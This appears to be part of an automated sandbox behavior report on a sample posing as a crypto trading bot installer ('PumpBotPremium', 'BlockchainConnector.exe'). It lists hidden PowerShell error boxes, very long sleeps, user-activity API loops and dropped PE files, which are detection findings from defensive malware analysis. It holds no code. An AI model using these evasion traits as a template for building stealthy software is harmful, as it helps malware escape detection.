Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899884 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899772 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899652 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899522 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899373 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899262 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899151 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897906
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7119 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1263 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4569 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1724 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1237
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2538
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI8554.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7BF7.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C48.tmp Jump to dropped file
